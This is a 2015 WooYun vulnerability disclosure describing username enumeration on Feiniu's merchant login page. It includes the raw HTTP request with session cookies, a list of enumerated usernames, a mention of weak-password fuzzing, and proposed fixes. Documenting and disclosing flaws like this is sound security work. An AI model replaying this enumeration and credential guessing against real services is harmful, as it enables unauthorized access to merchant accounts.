当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152801

漏洞标题:飞牛网某处设计缺陷可导致商家信息泄露

相关厂商:飞牛网

漏洞作者: sqlfeng

提交时间:2015-11-09 12:06

修复时间:2015-12-24 12:26

公开时间:2015-12-24 12:26

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开

简要描述:

详细说明:

http://sjmember.feiniu.com/static/html/login.html
输入用户名自动判断是否存在,
抓个包

POST /service/call.do?callback=jQuery1720026086857076734304_1446970915778 HTTP/1.1
Host: sjmember.feiniu.com
Content-Length: 129
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Origin: http://sjmember.feiniu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://sjmember.feiniu.com/static/html/wjml.html?backUrl=http%3A%2F%2Fzhaoshang.feiniu.com%2FapplyCompanyInfo%2Fapply.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: cart_token=0d35c93d46cf9f5a206bb5aae5f52f45_1446970157; guid=ZOy40cdO-ogR7-4G7l-89LB-eh72rLsHVDgL; first_login_time=1446970158429; _jzqx=1.1446970159.1446970159.1.jzqsr=wooyun%2Eorg|jzqct=/corps/page/33.-; _jzqckmp=1; _jzqy=1.1446970218.1446970218.1.jzqsr=baidu.-; uitox_shop=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2239d4b44810a7568bc40299f2d9bb1a08%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%2210.201.128.250%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F45.0.2454.85+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1446970450%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D2b7ad4eb543ce59af9c547feb60e391b; access=3; ref=ref_https://www.baidu.com; C_dist=CPG6_CS000021; C_dist_area=CS000021_150400_150428_1504280005; _gat_UA-46390714-1=1; _ga=GA1.2.1484248303.1446970159; _jzqa=1.923256954181115300.1446970159.1446970159.1446970159.1; _jzqc=1; __xsptplus116=116.3.1446970453.1446970846.2%232%7Cwww.baidu.com%7C%7C%7C%7C%23%234FXsWj22qDz-3dE_y7P4JH1Q7X44Z1As%23; _jzqb=1.5.10.1446970159.1; b1e5e89ac7114e55=C10443A82E26E7624FD93A540626146C; csrf_cookie_uitox_member=d2e62ccd8b1596c48d27874e661c4c2e; 21dbedcc38ba9dce=aHR0cHMlM0ElMkYlMkZtZW1iZXIuZmVpbml1LmNvbSUyRmdldGF3YXklMkZsb2dpbkJhbm5lciUzRmNhbGxiYWNrJTNEalF1ZXJ5MTkxMDU1MTQyMjI2MDQ2ODgyNTdfMTQ0Njk3MDg5Mzk1MCUyNl8lM0QxNDQ2OTcwODkzOTUx; TS015ed114=01cfbf1eb56b07aec7026ec99117ea31800abfb6ab6ce610580f47e6c778a54ee60c53d2da5d3ae77b415b47dc1b1844395b31a63df409457ef27e980f6f84ed0a4aa447e096c94955dacff5fdc91ba90ded031619; Hm_lvt_7f78a821324600a0f059acdb24cf0937=1446970159,1446970218,1446970452; Hm_lpvt_7f78a821324600a0f059acdb24cf0937=1446970907; CLIENT_ID=14469709121968960115935
Connection: close
version=1.0&method=feiniu.member.isExistAccount&params=%7B%22userName%22%3A%22用户名%22%2C%22loginNameType%22%3A%22username%22%7D


找份用户名字典跑一下

1	zhangwei	200	false	false	261	
19 wanglei 200 false false 261
26 zhangjie 200 false false 261
27 zhanglei 200 false false 261
141 wangjian 200 false false 261
184 zhangkai 200 false false 261
235 chenliang 200 false false 261
255 wangjian 200 false false 261
261 zhangjie 200 false false 261
309 zhangjianguo 200 false false 261
320 zhanglei 200 false false 261
390 lixiang 200 false false 261
276 chenchen 200 false false 261
445 wanglei 200 false false 261
658 MANAGER 200 false false 261
3361 elaine 200 false false 261
4860 jackie 200 false false 261
5275 justin 200 false false 261
6054 louise 200 false false 261
8246 sherry 200 false false 261
8715 tiffany 200 false false 261
9325 yvette 200 false false 261


拼音部分是用户名
再fuzz下弱口令,出来了一些

漏洞证明:

QQ截图20151108164752.png


QQ截图20151108164830.png


QQ截图20151108164853.png

修复方案:

1、登录地方验证码
2、限制登录密码错误次数
3、弱口令强制修改密码

版权声明:转载请注明来源 sqlfeng@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-09 12:24

厂商回复:

安全部门已经提交过给开发了,在开发测试中,还是被发现了,多谢:)

最新状态:

暂无


漏洞评价:

评价

  1. 2015-11-09 12:15 | 包包 ( 路人 | Rank:22 漏洞数:13 | 我是菜鸟,我怕谁?小弟新来,望大牛多多包...)

    来开会啦,开会啦

  2. 2015-11-09 12:27 | sqlfeng ( 普通白帽子 | Rank:368 漏洞数:54 | http://weibo.com/fds1986)

    @包包 傻吊你过来 给你看个宝贝